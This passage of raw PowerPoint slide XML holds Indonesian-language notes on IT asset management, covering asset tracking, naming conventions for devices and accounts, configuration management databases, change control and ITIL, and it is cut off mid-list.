              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konvensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun di database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CMDB) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> label </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama host dan DNS (support.microsoft.com/id/us/help/909264/naming-conventions- in-active-directory-for-computers-domains-sites-and). Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwujud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tag dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DNS CNAME dan TXT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen-komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>ITIL® </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ITIL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen-elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Aset </a:t>
            </a:r>
            <a:r>
